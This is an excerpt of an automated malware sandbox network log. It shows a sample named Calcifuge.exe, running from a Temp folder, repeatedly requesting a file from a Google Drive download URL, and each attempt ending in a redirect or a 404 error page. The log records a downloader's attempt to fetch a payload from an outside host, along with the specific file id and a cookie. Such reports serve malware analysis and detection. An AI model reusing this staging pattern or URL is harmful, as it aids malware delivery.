                                                                                              Cookie: NID=520=gEFkAX9xLNqylUlEIDqIwRnXUlNd_KEn4OYgdA5ekkJab1L84if5xMJbATHi6YOreCN2h_XVeABbWtP4VO744B_eESzVhWdoRsCepBj_0FI2Xpw81brPO8IrMD2TxcFH4a3gfXzRghKi7UGUzLJDO1yCmOoC43M9-lRohsfnaLl8K9qAjAE5rTAJlI9Yi5raAA
                                                                                              2025-01-11 02:53:33 UTC1844INHTTP/1.1 404 Not Found
                                                                                              X-GUploader-UploadID: AFIdbgS9CFESnjFqNbJTq93mgzw1oweHUgqV_UZiCzYk0-WceTGduNQilj0TENk2uPkiiOmc
                                                                                              Content-Type: text/html; charset=utf-8
                                                                                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                              Pragma: no-cache
                                                                                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                              Date: Sat, 11 Jan 2025 02:53:33 GMT
                                                                                              Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                              Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                              Content-Security-Policy: script-src 'nonce-TIJcnxkyUD8SrrSBW_gj6Q' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                              Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                                              Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                                              Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                              Cross-Origin-Opener-Policy: same-origin
                                                                                              Content-Length: 1652
                                                                                              Server: UploadServer
                                                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                              Content-Security-Policy: sandbox allow-scripts
                                                                                              Connection: close
                                                                                              2025-01-11 02:53:33 UTC1652INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 6e 35 64 74 64 39 42 6e 32 4b 36 54 34 79 45 4e 71 4d 36 59 64 77 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c
                                                                                              Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="n5dtd9Bn2K6T4yENqM6Ydw">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                              56192.168.2.453777172.217.16.2064437824C:\Users\user\AppData\Local\Temp\Calcifuge.exe
                                                                                              TimestampBytes transferredDirectionData
                                                                                              2025-01-11 02:53:34 UTC428OUTGET /uc?export=download&id=1__K97xhSgiaAKAN4Rb1oxo_tdpY9Md3o HTTP/1.1
                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                              Host: drive.google.com
                                                                                              Cache-Control: no-cache
                                                                                              Cookie: NID=520=gEFkAX9xLNqylUlEIDqIwRnXUlNd_KEn4OYgdA5ekkJab1L84if5xMJbATHi6YOreCN2h_XVeABbWtP4VO744B_eESzVhWdoRsCepBj_0FI2Xpw81brPO8IrMD2TxcFH4a3gfXzRghKi7UGUzLJDO1yCmOoC43M9-lRohsfnaLl8K9qAjAE5rTAJlI9Yi5raAA
                                                                                              2025-01-11 02:53:34 UTC1920INHTTP/1.1 303 See Other
                                                                                              Content-Type: application/binary
                                                                                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                              Pragma: no-cache
                                                                                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                              Date: Sat, 11 Jan 2025 02:53:34 GMT
                                                                                              Location: https://drive.usercontent.google.com/download?id=1__K97xhSgiaAKAN4Rb1oxo_tdpY9Md3o&export=download
                                                                                              Strict-Transport-Security: max-age=31536000
                                                                                              Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                              Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                              Cross-Origin-Opener-Policy: same-origin
                                                                                              Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                              Content-Security-Policy: script-src 'nonce-Jol3wGuZ0iaZykHy18cevQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                              Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                                              Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                                              Server: ESF
                                                                                              Content-Length: 0
                                                                                              X-XSS-Protection: 0
                                                                                              X-Frame-Options: SAMEORIGIN
                                                                                              X-Content-Type-Options: nosniff
                                                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                              Connection: close


                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                              57192.168.2.453778172.217.16.1294437824C:\Users\user\AppData\Local\Temp\Calcifuge.exe
                                                                                              TimestampBytes transferredDirectionData
                                                                                              2025-01-11 02:53:35 UTC470OUTGET /download?id=1__K97xhSgiaAKAN4Rb1oxo_tdpY9Md3o&export=download HTTP/1.1
                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                              Cache-Control: no-cache
                                                                                              Host: drive.usercontent.google.com
                                                                                              Connection: Keep-Alive
                                                                                              Cookie: NID=520=gEFkAX9xLNqylUlEIDqIwRnXUlNd_KEn4OYgdA5ekkJab1L84if5xMJbATHi6YOreCN2h_XVeABbWtP4VO744B_eESzVhWdoRsCepBj_0FI2Xpw81brPO8IrMD2TxcFH4a3gfXzRghKi7UGUzLJDO1yCmOoC43M9-lRohsfnaLl8K9qAjAE5rTAJlI9Yi5raAA
                                                                                              2025-01-11 02:53:35 UTC1844INHTTP/1.1 404 Not Found
                                                                                              X-GUploader-UploadID: AFIdbgTTwdrj4cojNJT66L7JCNUh80ZW52EM_MWoYryauThTi8MRuELgBVX-1jsqRX72EwJc
                                                                                              Content-Type: text/html; charset=utf-8
                                                                                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                              Pragma: no-cache
                                                                                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                              Date: Sat, 11 Jan 2025 02:53:35 GMT
                                                                                              Cross-Origin-Opener-Policy: same-origin
                                                                                              Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                              Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                              Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                              Content-Security-Policy: script-src 'nonce-9jZPsYEbYliB7v0dK8_RZA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                              Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                                              Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                                              Content-Length: 1652
                                                                                              Server: UploadServer
                                                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                              Content-Security-Policy: sandbox allow-scripts
                                                                                              Connection: close
                                                                                              2025-01-11 02:53:35 UTC1652INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 48 78 59 37 5f 67 69 6e 58 48 6e 71 75 6b 4d 6d 68 6c 67 75 76 77 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c
                                                                                              Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="HxY7_ginXHnqukMmhlguvw">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                              58192.168.2.453779172.217.16.2064437824C:\Users\user\AppData\Local\Temp\Calcifuge.exe
                                                                                              TimestampBytes transferredDirectionData
                                                                                              2025-01-11 02:53:36 UTC428OUTGET /uc?export=download&id=1__K97xhSgiaAKAN4Rb1oxo_tdpY9Md3o HTTP/1.1
                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                              Host: drive.google.com
                                                                                              Cache-Control: no-cache
                                                                                              Cookie: NID=520=gEFkAX9xLNqylUlEIDqIwRnXUlNd_KEn4OYgdA5ekkJab1L84if5xMJbATHi6YOreCN2h_XVeABbWtP4VO744B_eESzVhWdoRsCepBj_0FI2Xpw81brPO8IrMD2TxcFH4a3gfXzRghKi7UGUzLJDO1yCmOoC43M9-lRohsfnaLl8K9qAjAE5rTAJlI9Yi5raAA
                                                                                              2025-01-11 02:53:37 UTC1920INHTTP/1.1 303 See Other
                                                                                              Content-Type: application/binary
                                                                                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                              Pragma: no-cache
                                                                                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                              Date: Sat, 11 Jan 2025 02:53:36 GMT
                                                                                              Location: https://drive.usercontent.google.com/download?id=1__K97xhSgiaAKAN4Rb1oxo_tdpY9Md3o&export=download
                                                                                              Strict-Transport-Security: max-age=31536000
                                                                                              Cross-Origin-Opener-Policy: same-origin
                                                                                              Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                              Content-Security-Policy: script-src 'nonce-CaK0YKm14FSle1W1Z1rmZg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                              Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                                              Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                              Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                                              Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                              Server: ESF
                                                                                              Content-Length: 0
                                                                                              X-XSS-Protection: 0
                                                                                              X-Frame-Options: SAMEORIGIN
                                                                                              X-Content-Type-Options: nosniff
                                                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                              Connection: close


                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                              59192.168.2.453780172.217.16.1294437824C:\Users\user\AppData\Local\Temp\Calcifuge.exe
                                                                                              TimestampBytes transferredDirectionData
                                                                                              2025-01-11 02:53:37 UTC470OUTGET /download?id=1__K97xhSgiaAKAN4Rb1oxo_tdpY9Md3o&export=download HTTP/1.1
                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                              Cache-Control: no-cache
                                                                                              Host: drive.usercontent.google.com
                                                                                              Connection: Keep-Alive
                                                                                              Cookie: NID=520=gEFkAX9xLNqylUlEIDqIwRnXUlNd_KEn4OYgdA5ekkJab1L84if5xMJbATHi6YOreCN2h_XVeABbWtP4VO744B_eESzVhWdoRsCepBj_0FI2Xpw81brPO8IrMD2TxcFH4a3gfXzRghKi7UGUzLJDO1yCmOoC43M9-lRohsfnaLl8K9qAjAE5rTAJlI9Yi5raAA
                                                                                              2025-01-11 02:53:38 UTC1851INHTTP/1.1 404 Not Found
                                                                                              X-GUploader-UploadID: AFIdbgTZ40gr02KsgfA8SWVVO6zVTGeSgfCYrUOFE1VSulmqf_n1e59064tx_95GPoGYyDuYEfsJn4w
                                                                                              Content-Type: text/html; charset=utf-8
                                                                                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                              Pragma: no-cache
                                                                                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                              Date: Sat, 11 Jan 2025 02:53:38 GMT
                                                                                              Cross-Origin-Opener-Policy: same-origin
                                                                                              Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                              Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                              Content-Security-Policy: script-src 'nonce-NGd7-PDhCBccOVxFbeGJhQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                              Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                                              Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                                              Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                              Content-Length: 1652
                                                                                              Server: UploadServer
                                                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                              Content-Security-Policy: sandbox allow-scripts
                                                                                              Connection: close
                                                                                              2025-01-11 02:53:38 UTC1652INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 48 5f 46 69 61 57 6b 31 65 33 59 56 4c 4b 35 50 4e 48 4b 36 36 51 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c
                                                                                              Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="H_FiaWk1e3YVLK5PNHK66Q">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                              60192.168.2.453781172.217.16.2064437824C:\Users\user\AppData\Local\Temp\Calcifuge.exe
                                                                                              TimestampBytes transferredDirectionData
                                                                                              2025-01-11 02:53:39 UTC428OUTGET /uc?export=download&id=1__K97xhSgiaAKAN4Rb1oxo_tdpY9Md3o HTTP/1.1
                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                              Host: drive.google.com
                                                                                              Cache-Control: no-cache
                                                                                              Cookie: NID=520=gEFkAX9xLNqylUlEIDqIwRnXUlNd_KEn4OYgdA5ekkJab1L84if5xMJbATHi6YOreCN2h_XVeABbWtP4VO744B_eESzVhWdoRsCepBj_0FI2Xpw81brPO8IrMD2TxcFH4a3gfXzRghKi7UGUzLJDO1yCmOoC43M9-lRohsfnaLl8K9qAjAE5rTAJlI9Yi5raAA
                                                                                              2025-01-11 02:53:39 UTC1920INHTTP/1.1 303 See Other
                                                                                              Content-Type: application/binary
                                                                                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                              Pragma: no-cache
                                                                                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                              Date: Sat, 11 Jan 2025 02:53:39 GMT
                                                                                              Location: https://drive.usercontent.google.com/download?id=1__K97xhSgiaAKAN4Rb1oxo_tdpY9Md3o&export=download
                                                                                              Strict-Transport-Security: max-age=31536000
                                                                                              Cross-Origin-Opener-Policy: same-origin
                                                                                              Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                              Content-Security-Policy: script-src 'nonce-G-ABYfKO1GDwE9XbVtyA-w' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                              Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                                              Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                              Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                              Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                                              Server: ESF
                                                                                              Content-Length: 0
                                                                                              X-XSS-Protection: 0
                                                                                              X-Frame-Options: SAMEORIGIN
                                                                                              X-Content-Type-Options: nosniff
                                                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                              Connection: close


                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                              61192.168.2.453782172.217.16.1294437824C:\Users\user\AppData\Local\Temp\Calcifuge.exe
                                                                                              TimestampBytes transferredDirectionData
                                                                                              2025-01-11 02:53:40 UTC470OUTGET /download?id=1__K97xhSgiaAKAN4Rb1oxo_tdpY9Md3o&export=download HTTP/1.1
                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                              Cache-Control: no-cache
                                                                                              Host: drive.usercontent.google.com
                                                                                              Connection: Keep-Alive
                                                                                              Cookie: NID=520=gEFkAX9xLNqylUlEIDqIwRnXUlNd_KEn4OYgdA5ekkJab1L84if5xMJbATHi6YOreCN2h_XVeABbWtP4VO744B_eESzVhWdoRsCepBj_0FI2Xpw81brPO8IrMD2TxcFH4a3gfXzRghKi7UGUzLJDO1yCmOoC43M9-lRohsfnaLl8K9qAjAE5rTAJlI9Yi5raAA
                                                                                              2025-01-11 02:53:40 UTC1851INHTTP/1.1 404 Not Found
                                                                                              X-GUploader-UploadID: AFIdbgSWL9vuJ7KdwhvrJ9VugPA6MlE8_1W0SNe_skQ_pfqJQ8ZZIUd10sKRtOTiVRRnBzhBLcTi7Do
                                                                                              Content-Type: text/html; charset=utf-8
                                                                                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                              Pragma: no-cache
                                                                                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                              Date: Sat, 11 Jan 2025 02:53:40 GMT
                                                                                              Content-Security-Policy: script-src 'nonce-hgAgtASwTeNjyWlD3ZnS_w' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                              Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                                              Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                              Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                                              Cross-Origin-Opener-Policy: same-origin
                                                                                              Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                              Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                              Content-Length: 1652
                                                                                              Server: UploadServer
                                                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                              Content-Security-Policy: sandbox allow-scripts
                                                                                              Connection: close
                                                                                              2025-01-11 02:53:40 UTC1652INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 79 44 6b 49 77 53 6d 39 67 51 50 46 5a 39 4b 30 7a 74 47 37 30 67 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c
                                                                                              Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="yDkIwSm9gQPFZ9K0ztG70g">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                              62192.168.2.453783172.217.16.2064437824C:\Users\user\AppData\Local\Temp\Calcifuge.exe
                                                                                              TimestampBytes transferredDirectionData
                                                                                              2025-01-11 02:53:41 UTC428OUTGET /uc?export=download&id=1__K97xhSgiaAKAN4Rb1oxo_tdpY9Md3o HTTP/1.1
                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                              Host: drive.google.com
                                                                                              Cache-Control: no-cache
                                                                                              Cookie: NID=520=gEFkAX9xLNqylUlEIDqIwRnXUlNd_KEn4OYgdA5ekkJab1L84if5xMJbATHi6YOreCN2h_XVeABbWtP4VO744B_eESzVhWdoRsCepBj_0FI2Xpw81brPO8IrMD2TxcFH4a3gfXzRghKi7UGUzLJDO1yCmOoC43M9-lRohsfnaLl8K9qAjAE5rTAJlI9Yi5raAA
                                                                                              2025-01-11 02:53:41 UTC1920INHTTP/1.1 303 See Other
                                                                                              Content-Type: application/binary
                                                                                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                              Pragma: no-cache
                                                                                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                              Date: Sat, 11 Jan 2025 02:53:41 GMT
                                                                                              Location: https://drive.usercontent.google.com/download?id=1__K97xhSgiaAKAN4Rb1oxo_tdpY9Md3o&export=download
